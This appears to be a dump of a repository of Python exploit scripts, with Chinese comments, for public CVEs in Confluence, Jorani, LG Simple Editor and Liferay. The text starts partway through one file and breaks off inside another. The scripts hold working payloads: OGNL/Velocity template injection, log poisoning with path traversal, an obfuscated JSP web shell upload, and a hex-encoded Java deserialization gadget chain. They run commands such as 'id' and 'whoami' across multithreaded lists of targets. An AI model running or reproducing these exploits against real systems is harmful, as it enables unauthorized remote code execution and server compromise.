43 | # 如果目标状态为 "not vulnerable",则不保存到结果中
44 | if initial_vuln_status == 'not vulnerable':
45 | return
46 |
47 | target_info = {
48 | 'target_url': url,
49 | 'product': product,
50 | 'version': version,
51 | 'vulnerability_status': initial_vuln_status,
52 | }
53 |
54 | try:
55 | server_info_url = f"{url}{SERVER_INFO_URI}"
56 | response = requests.get(server_info_url, headers=headers, verify=False, allow_redirects=False, timeout=5)
57 | response.raise_for_status()
58 | except RequestException as err:
59 | print(f"{url} - 连接到 {server_info_url} 时出现错误: {err}")
60 | return
61 |
62 | if response.status_code != 200:
63 | print(f"{url} - 无法访问脆弱的端点 {SERVER_INFO_URI},收到状态码 {response.status_code}。目标可能已打补丁.")
64 | if initial_vuln_status == 'potentially vulnerable':
65 | target_info['vulnerability_status'] = 'likely not exploitable'
66 |
67 | with open(success_file, 'a') as s_file:
68 | s_file.write("++++++++++++++++++\n")
69 | s_file.write(f"目标URL: {url}\n")
70 | s_file.write(f"产品: {product}\n")
71 | s_file.write(f"版本号: {version}\n")
72 | s_file.write(f"漏洞状态: {initial_vuln_status}\n\n")
73 |
74 | def scan_targets(targets, proxies={}, success_file=None):
75 | for target in targets:
76 | target = target.strip()
77 | check_for_vulnerability(target, proxies, success_file)
78 |
79 | if __name__ == '__main__':
80 | parser = argparse.ArgumentParser(description="Confluence 权限提升漏洞CVE-2023-22515")
81 | parser.add_argument("-u", "--url", help="目标URL")
82 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
83 | args = parser.parse_args()
84 |
85 | if not args.url and not args.file:
86 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
87 | exit(1)
88 |
89 | if args.url:
90 | urls = [args.url]
91 | elif args.file:
92 | with open(args.file, 'r') as file:
93 | urls = file.readlines()
94 |
95 | proxies = {}
96 | success_file = 'success_targets.txt'
97 |
98 | for url in urls:
99 | url = url.strip()
100 | if not url.startswith("http://") and not url.startswith("https://"):
101 | scan_targets(["http://" + url, "https://" + url], proxies, success_file)
102 | else:
103 | scan_targets([url], proxies, success_file)
104 |
105 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
106 |
--------------------------------------------------------------------------------
/Confluence_CVE-2023-22517_Exploit.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2024-01-22
3 |
4 | import requests
5 | import argparse
6 | import threading
7 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
8 |
9 | def check_for_vulnerability(url, proxies=None, success_file=None):
10 | headers = {
11 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
12 | "Content-type": "application/x-www-form-urlencoded"
13 | }
14 |
15 | payload = "name=aaxxxa&list=ccc&list=ddd&list=ddd&list=ddd&list=ddd&listKey=11&size=1&multiple=1&label=111\\u0027%2b#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.poc[0],{})%2b\\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({'id'}))"
16 |
17 | try:
18 | response = requests.post(url + '/template/aui/text-inline.vm', headers=headers, data=payload, proxies=proxies, verify=False)
19 |
20 | if response.status_code == 200 and 'X-Cmd-Response' in response.headers:
21 | with open(success_file, 'a') as s_file:
22 | x_cmd_response = response.headers.get('X-Cmd-Response', 'N/A')
23 | s_file.write(f"++++++++++++++++++\n")
24 | s_file.write(f"目标URL: {url}\n")
25 | s_file.write(f"响应内容:\n{x_cmd_response}\n\n")
26 | return True
27 | except Exception as e:
28 | print(f"发生异常:{e}")
29 |
30 | return False
31 |
32 | def scan_targets(targets, proxies=None, success_file=None):
33 | for target in targets:
34 | target = target.strip()
35 | check_for_vulnerability(target, proxies, success_file)
36 |
37 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
38 | threads = []
39 |
40 | for i in range(num_threads):
41 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
42 | threads.append(thread)
43 |
44 | for thread in threads:
45 | thread.start()
46 |
47 | for thread in threads:
48 | thread.join()
49 |
50 | if __name__ == '__main__':
51 | parser = argparse.ArgumentParser(description="Atlassian Confluence 模板注入代码执行漏洞CVE-2023-22527")
52 | parser.add_argument("-u", "--url", help="目标URL")
53 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
54 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
55 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
56 | args = parser.parse_args()
57 |
58 | if not args.url and not args.file:
59 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
60 | exit(1)
61 |
62 | if args.url:
63 | urls = [args.url]
64 | elif args.file:
65 | with open(args.file, 'r') as file:
66 | urls = file.readlines()
67 |
68 | success_file = 'success_targets.txt'
69 |
70 | proxies = {
71 | "http": args.proxy,
72 | "https": args.proxy
73 | } if args.proxy else None
74 |
75 | multi_threaded_scan(urls, proxies, success_file, args.threads)
76 |
77 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
78 |
--------------------------------------------------------------------------------
/Jorani_CVE-2023-26469_exp.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2023-11-13
3 |
4 | import argparse
5 | import threading
6 | import requests
7 | import datetime
8 | import re
9 | import base64
10 | import random
11 | import string
12 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
13 |
14 | def check_for_vulnerability(url, proxies=None, success_file=None):
15 | try:
16 | # 正则表达式模式
17 | CSRF_PATTERN = re.compile('"
35 | PATH_TRAV_PAYLOAD = "../../application/logs"
36 | command = "id"
37 |
38 | # 创建会话并获取会话 cookie
39 | session = requests.Session()
40 | # print("Requesting session cookie")
41 | response = session.get(url + URLS['login'], verify=False)
42 | cookies = session.cookies.get_dict()
43 |
44 | # 提取 CSRF 令牌
45 | csrf_token = re.findall(CSRF_PATTERN, response.text)[0]
46 | # print(f"Poisoning log file with payload: '{POISON_PAYLOAD}'")
47 | # print(f"Setting path traversal to '{PATH_TRAV_PAYLOAD}'")
48 | # print(f"Recovered CSRF Token: {csrf_token}")
49 |
50 | # 向服务器发送恶意请求以污染日志文件
51 | data = {
52 | "csrf_test_jorani": csrf_token,
53 | "last_page": "session/login",
54 | "language": PATH_TRAV_PAYLOAD,
55 | "login": POISON_PAYLOAD,
56 | "CipheredValue": "DummyPassword"
57 | }
58 | session.post(url + URLS['login'], data=data)
59 |
60 | log_file_name = f"log-{datetime.date.today().isoformat()}"
61 |
62 | # 设置特殊请求头以执行操作系统命令
63 | BypassRedirect = {
64 | 'X-REQUESTED-WITH': 'XMLHttpRequest',
65 | HEADER_NAME: base64.b64encode(f"echo ---------;{command} 2>&1;echo ---------;".encode()).decode()
66 | }
67 | response = session.get(url + URLS['view'] + log_file_name, headers=BypassRedirect)
68 | command_output = re.findall(CMD_PATTERN, response.text)
69 | try:
70 | print(f"目标 {url} 响应内容 {command_output[0].strip()}")
71 | with open(success_file, 'a') as s_file:
72 | s_file.write(f"++++++++++++++++++\n")
73 | s_file.write(f"目标URL: {url}\n")
74 | s_file.write(f"响应内容: {command_output[0].strip()}\n\n")
75 | except Exception as e:
76 | print(f"目标 {url} 发生异常:{e}")
77 | return False
78 | except Exception as e:
79 | print(f"目标 {url} 发生异常:{e}")
80 |
81 | def scan_targets(targets, proxies=None, success_file=None):
82 | for target in targets:
83 | target = target.strip()
84 | check_for_vulnerability(target, proxies, success_file)
85 |
86 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
87 | threads = []
88 |
89 | for i in range(num_threads):
90 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
91 | threads.append(thread)
92 |
93 | for thread in threads:
94 | thread.start()
95 |
96 | for thread in threads:
97 | thread.join()
98 |
99 | if __name__ == '__main__':
100 | parser = argparse.ArgumentParser(description="Jorani远程命令执行漏洞CVE-2023-26469")
101 | parser.add_argument("-u", "--url", help="目标URL")
102 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
103 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
104 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
105 | args = parser.parse_args()
106 |
107 | if not args.url and not args.file:
108 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
109 | exit(1)
110 |
111 | if args.url:
112 | urls = [args.url]
113 | elif args.file:
114 | with open(args.file, 'r') as file:
115 | urls = file.readlines()
116 |
117 | success_file = 'success_targets.txt'
118 |
119 | proxies = {
120 | "http": args.proxy,
121 | "https": args.proxy
122 | } if args.proxy else None
123 |
124 | multi_threaded_scan(urls, proxies, success_file, args.threads)
125 |
126 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
127 |
--------------------------------------------------------------------------------
/LGSimpleEdiotr_CVE-2023-40498_exploit.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2023-11-17
3 |
4 | import requests
5 | import argparse
6 | import threading
7 | import string
8 | import random
9 | from urllib3.exceptions import InsecureRequestWarning
10 |
11 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
12 |
13 |
14 | def generate_random_string(length=5):
15 | letters = string.ascii_lowercase
16 | return ''.join(random.choice(letters) for _ in range(length))
17 |
18 |
19 | def check_for_vulnerability(url, proxies=None, success_file=None):
20 | try:
21 | random_string = generate_random_string()
22 |
23 | path1 = "/simpleeditor/imageManager/uploadImage.do"
24 | headers1 = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0',
25 | 'Content-Type': 'multipart/form-data; boundary=---------------------------819989449787154297538622041045'}
26 | data1 = """-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile\"; filename=\"{file_name}.bmp\"\r\nContent-Type: image/bmp\r\nContent-Transfer-Encoding: binary\r\n\r\n<%@ page import="java.util.Scanner" pageEncoding="UTF-8" %>
27 |
Just For Fun
28 | Build By LandGrey
29 | <%!
32 | public static String getPicture(String str) throws Exception{{
33 | String fileSeparator =String.valueOf(java.io.File.separatorChar);
34 | if(fileSeparator.equals("\\\\")){{
35 | str = new String(new byte[] {{99, 109, 100, 46, 101, 120, 101, 32, 47, 67, 32}}) + str;
36 | }}else{{
37 | str = new String(new byte[] {{47, 98, 105, 110, 47, 98, 97, 115, 104, 32, 45, 99, 32}}) + str;
38 | }} Class rt = Class.forName(new String(new byte[] {{ 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 }}));
39 | Process e = (Process) rt.getMethod(new String(new byte[] {{ 101, 120, 101, 99 }}), String.class).invoke(rt.getMethod(new String(new byte[] {{ 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 }})).invoke(null, new Object[]{{}}), new Object[] {{ str }}); Scanner sc = new Scanner(e.getInputStream()).useDelimiter("\\\\A");
40 | String result = ""; result = sc.hasNext() ? sc.next() : result;
41 | sc.close(); return result; }}%><% String name ="Input Nothing"; String query = request.getParameter("q"); if(query != null) {{ name = getPicture(query); }}%><%= name %>
\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadPath\"\r\n\r\n/\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_x\"\r\n\r\n-1000\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_y\"\r\n\r\n-1000\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_width\"\r\n\r\n1920\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_height\"\r\n\r\n1080\r\n-----------------------------819989449787154297538622041045--""";
42 | data1 = data1.format(file_name=random_string)
43 | response1 = requests.post(url + path1, data=data1, headers=headers1, verify=False)
44 |
45 | if response1.status_code == 200:
46 | path2 = "/simpleeditor/fileSystem/makeDetailContent.do"
47 | data2 = {
48 | "command": "cp",
49 | "option": "-f",
50 | "srcPath": f"/{random_string}_original.bmp",
51 | "destPath": f"/{random_string}.jsp"
52 | }
53 | headers2 = {
54 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47',
55 | 'X-Requested-With': 'XMLHttpRequest',
56 | 'Accept': 'application/json',
57 | 'Content-Type': 'application/json'
58 | }
59 |
60 | response2 = requests.post(url + path2, json=data2, headers=headers2, verify=False)
61 |
62 | if response2.status_code == 200 and "errorMessage" in response2.json() and response2.json()[
63 | "errorMessage"] == "success":
64 | print(f"目标URL: {url}")
65 | print(f"响应内容: {url}/simpleeditor/{random_string}.jsp#")
66 | with open(success_file, 'a') as s_file:
67 | s_file.write(f"++++++++++++++++++\n")
68 | s_file.write(f"目标URL: {url}\n")
69 | s_file.write(f"响应内容: {url}/simpleeditor/{random_string}.jsp#\n\n")
70 | return True
71 | else:
72 | print("第二个请求失败")
73 | return False
74 |
75 | else:
76 | print("第一个请求失败")
77 | return False
78 |
79 | except Exception as e:
80 | print(f"发生异常:{e}")
81 | return False
82 |
83 |
84 | def scan_targets(targets, proxies=None, success_file=None):
85 | for target in targets:
86 | target = target.strip()
87 | check_for_vulnerability(target, proxies, success_file)
88 |
89 |
90 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
91 | threads = []
92 |
93 | for i in range(num_threads):
94 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
95 | threads.append(thread)
96 |
97 | for thread in threads:
98 | thread.start()
99 |
100 | for thread in threads:
101 | thread.join()
102 |
103 |
104 | if __name__ == '__main__':
105 | parser = argparse.ArgumentParser(description="LG Simple Editor 远程代码执行CVE-2023-40498")
106 | parser.add_argument("-u", "--url", help="目标URL")
107 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
108 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
109 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
110 | args = parser.parse_args()
111 |
112 | if not args.url and not args.file:
113 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
114 | exit(1)
115 |
116 | if args.url:
117 | urls = [args.url]
118 | elif args.file:
119 | with open(args.file, 'r') as file:
120 | urls = file.readlines()
121 |
122 | success_file = 'success_targets.txt'
123 |
124 | proxies = {
125 | "http": args.proxy,
126 | "https": args.proxy
127 | } if args.proxy else None
128 |
129 | multi_threaded_scan(urls, proxies, success_file, args.threads)
130 |
131 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
132 |
--------------------------------------------------------------------------------
/Liferay_CVE-2020-7961_Exploit.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2023-10-7
3 |
4 | import sys
5 | import requests
6 | import time
7 | import json
8 | import re
9 | from urllib.parse import urlparse
10 | import random
11 | import argparse
12 |
13 | requests.packages.urllib3.disable_warnings()
14 |
15 | def check_for_vulnerability(url, proxies={}, success_file=None):
16 |
17 | try:
18 | cmd = 'whoami'
19 | payload = 'ACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B7870000000027372002B6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E436F6D70617261746F72E3A188EA7322A4480200024C000A636F6D70617261746F7271007E00014C000870726F70657274797400124C6A6176612F6C616E672F537472696E673B78707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707400106F757470757450726F706572746965737704000000037372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000001103CAFEBABE0000003100DD0A0036006C0A006D006E0A006F00700700710800720A007300740A007500760A007500770700780800790A0009007A08007B07007C0A000D006C08007D0A007E007F0A008000810800820A008000830800840B0085008608008708008808008907008A0A0019008B0A0019008C0A0019008D07008E07008F0A009000910A001E00920A001D00930700940A0022006C0A001D00950A002200960800970700980A0027006C0800990A0027009A0A0022009B0A0027009B0A0009009C0A009D009E08009F0A008000A00A00A100A20A00A100A30700A40A003300A50700A60700A70100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004636D64730100104C6A6176612F7574696C2F4C6973743B01000769734C696E75780100015A0100056F735479700100124C6A6176612F6C616E672F537472696E673B01000E70726F636573734275696C64657201001A4C6A6176612F6C616E672F50726F636573734275696C6465723B01000470726F630100134C6A6176612F6C616E672F50726F636573733B01000262720100184C6A6176612F696F2F42756666657265645265616465723B01000273620100184C6A6176612F6C616E672F537472696E674275666665723B0100046C696E65010006726573756C74010008726573706F6E73650100284C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E73653B01000C6F757470757453747265616D0100234C6A617661782F736572766C65742F536572766C65744F757470757453747265616D3B01000E73657276696365436F6E746578740100324C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578743B0100037265710100274C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B0100097265715F6669656C640100194C6A6176612F6C616E672F7265666C6563742F4669656C643B01000B63757272656E745F7265710100274C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526571756573743B010003636D6401000265780100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100124C7061796C6F61642F63625F74656D706C3B0100164C6F63616C5661726961626C65547970655461626C650100244C6A6176612F7574696C2F4C6973743C4C6A6176612F6C616E672F537472696E673B3E3B01000A457863657074696F6E730100097472616E73666F726D0100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B0100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000D63625F74656D706C2E6A6176610C003700380700A80C00A900AA0700AB0C00AC00AD01002B6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F52657175657374466163616465010007726571756573740700AE0C00AF00B00700B10C00B200B30C00B400B50100256F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526571756573740100026A6B0C00B600B70100000100136A6176612F7574696C2F41727261794C6973740100076F732E6E616D650700B80C00B900B70700BA0C00BB00BC01000377696E0C00BD00BE010007636D642E6578650700BF0C00C000C10100022F630100092F62696E2F626173680100022D630100186A6176612F6C616E672F50726F636573734275696C6465720C003700C20C00C300C40C00C500C60100166A6176612F696F2F42756666657265645265616465720100196A6176612F696F2F496E70757453747265616D5265616465720700C70C00C800C90C003700CA0C003700CB0100166A6176612F6C616E672F537472696E674275666665720C00CC00BC0C00CD00CE0100010A0100176A6176612F6C616E672F537472696E674275696C6465720100037E7E7E0C00CD00CF0C00D000BC0C00D100D20700D30C00D400D50100057574662D380C00D600D70700D80C00D900DA0C00DB00380100136A6176612F6C616E672F457863657074696F6E0C00DC00380100107061796C6F61642F63625F74656D706C010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C657401003B636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578745468726561644C6F63616C01001167657453657276696365436F6E7465787401003428294C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578743B010030636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E7465787401000A6765745265717565737401002928294C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B01000F6A6176612F6C616E672F436C6173730100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0100176A6176612F6C616E672F7265666C6563742F4669656C6401000D73657441636365737369626C65010004285A2956010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B010009676574486561646572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0100106A6176612F6C616E672F53797374656D01000B67657450726F70657274790100106A6176612F6C616E672F537472696E6701000B746F4C6F7765724361736501001428294C6A6176612F6C616E672F537472696E673B010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A01000E6A6176612F7574696C2F4C697374010003616464010015284C6A6176612F6C616E672F4F626A6563743B295A010013284C6A6176612F7574696C2F4C6973743B295601001372656469726563744572726F7253747265616D01001D285A294C6A6176612F6C616E672F50726F636573734275696C6465723B010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B010018284C6A6176612F696F2F496E70757453747265616D3B2956010013284C6A6176612F696F2F5265616465723B2956010008726561644C696E65010006617070656E6401002C284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E674275666665723B01002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E674275696C6465723B010008746F537472696E6701000B676574526573706F6E736501002A28294C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E73653B0100266F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E736501000F6765744F757470757453747265616D01002528294C6A617661782F736572766C65742F536572766C65744F757470757453747265616D3B0100086765744279746573010016284C6A6176612F6C616E672F537472696E673B295B420100216A617661782F736572766C65742F536572766C65744F757470757453747265616D0100057772697465010005285B422956010005636C6F736501000F7072696E74537461636B547261636500210035003600000000000300010037003800020039000002B7000500110000013D2AB70001B800024C2BB600034D12041205B600064E2D04B600072D2CB60008C000093A041904120AB6000B3A051905C601051905120CA500FEBB000D59B7000E3A06043607120FB800103A081908C600131908B600111212B6001399000603360715079A002419061214B9001502005719061216B9001502005719061905B90015020057A7002119061217B9001502005719061218B9001502005719061905B90015020057BB0019591906B7001A3A09190904B6001B571909B6001C3A0ABB001D59BB001E59190AB6001FB70020B700213A0BBB002259B700233A0C190BB60024593A0DC60013190C190DB600251226B6002557A7FFE8BB002759B700281229B6002A190CB6002BB6002A1229B6002AB6002C3A0E1904B6002D3A0F190FB6002E3A101910190E122FB60030B600311910B60032A700084C2BB60034B1000100040134013700330003003A0000009200240000001A0004001C0008001D000D001E0015001F001A002000240022002D0023003900240042002500450026004C0027005E00280061002A0066002B0070002C007A002D0087002F00910030009B003100A5003400B0003500B7003600BE003800D3003900DC003C00E7003D00F7004001150041011C004201230043012F00440134004A0137004801380049013C004B003B000000B60012004200F2003C003D0006004500EF003E003F0007004C00E800400041000800B0008400420043000900BE007600440045000A00D3006100460047000B00DC005800480049000C00E40050004A0041000D0115001F004B0041000E011C0018004C004D000F01230011004E004F00100008012C005000510001000D01270052005300020015011F00540055000300240110005600570004002D0107005800410005013800040059005A00010000013D005B005C0000005D0000000C0001004200F2003C005E0006005F000000040001003300010060006100010039000000490000000400000001B100000002003A0000000600010000004E003B0000002A000400000001005B005C0000000000010062006300010000000100640065000200000001006600670003000100600068000100390000003F0000000300000001B100000002003A00000006000100000051003B00000020000300000001005B005C000000000001006200630001000000010066006900020001006A00000002006B70740006747231706C65707701007871007E000D78'
20 | post_data=(
21 | 'cmd={"/expandocolumn/update-column":{}}&p_auth=test&formDate=2020&columnId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:'+payload+';"}'
22 | )
23 | headers = {
24 | 'Content-Type': 'application/x-www-form-urlencoded',
25 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",
26 | "jk": cmd
27 | }
28 | api_url = '{url}/api/jsonws/invoke'.format(url=url)
29 | resp = requests.post(url=api_url, data=post_data, headers=headers, timeout=60, verify=False, allow_redirects=False)
30 | pattern = '~~~(.*?)~~~'
31 | match = re.search(pattern, resp.content.decode('utf-8'), re.S | re.I)
32 | if match:
33 | result = match.group(1)
34 | result = result.strip()
35 | with open(success_file, 'a') as s_file:
36 | s_file.write(f"++++++++++++++++++\n")
37 | s_file.write(f"目标URL: {url}\n")
38 | s_file.write(f"Payload: whoami\n")
39 | s_file.write(f"响应内容:\n{result}\n\n")
40 | return True
41 | except Exception as e:
42 | print(f"发生异常:{e}")
43 | return False
44 |
45 | def scan_targets(targets, proxies={}, success_file=None):
46 | for target in targets:
47 | target = target.strip()
48 | check_for_vulnerability(target, proxies, success_file)
49 |
50 | if __name__ == '__main__':
51 | parser = argparse.ArgumentParser(description="Liferay Portal JSONS反序列化漏洞 CVE-2020-7961")
52 | parser.add_argument("-u", "--url", help="目标URL")
53 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
54 | args = parser.parse_args()
55 |
56 | if not args.url and not args.file:
57 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
58 | exit(1)
59 |
60 | if args.url:
61 | urls = [args.url]
62 | elif args.file:
63 | with open(args.file, 'r') as file:
64 | urls = file.readlines()
65 |
66 | proxies = {}
67 | success_file = 'success_targets.txt'
68 |
69 | for url in urls:
70 | url = url.strip()
71 | if not url.startswith("http://") and not url.startswith("https://"):
72 | scan_targets(["http://" + url, "https://" + url], proxies, success_file)
73 | else:
74 | scan_targets([url], proxies, success_file)
75 |
76 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
77 |
--------------------------------------------------------------------------------
/Liferay_CVE-2020-7961_Exploit_v4.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2023-10-9
3 |
4 | import sys
5 | import argparse
6 | import requests
7 | import time
8 | import json
9 | import re
10 | from urllib.parse import urlparse
11 | import random
12 |
13 | requests.packages.urllib3.disable_warnings()
14 |
15 | def check_for_vulnerability(url, cmd, interactive=False, proxies={}, success_file=None):
16 | try:
17 | payload = 'ACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B7870000000027372002B6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E436F6D70617261746F72E3A188EA7322A4480200024C000A636F6D70617261746F7271007E00014C000870726F70657274797400124C6A6176612F6C616E672F537472696E673B78707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707400106F757470757450726F706572746965737704000000037372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000001103CAFEBABE0000003100DD0A0036006C0A006D006E0A006F00700700710800720A007300740A007500760A007500770700780800790A0009007A08007B07007C0A000D006C08007D0A007E007F0A008000810800820A008000830800840B0085008608008708008808008907008A0A0019008B0A0019008C0A0019008D07008E07008F0A009000910A001E00920A001D00930700940A0022006C0A001D00950A002200960800970700980A0027006C0800990A0027009A0A0022009B0A0027009B0A0009009C0A009D009E08009F0A008000A00A00A100A20A00A100A30700A40A003300A50700A60700A70100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004636D64730100104C6A6176612F7574696C2F4C6973743B01000769734C696E75780100015A0100056F735479700100124C6A6176612F6C616E672F537472696E673B01000E70726F636573734275696C64657201001A4C6A6176612F6C616E672F507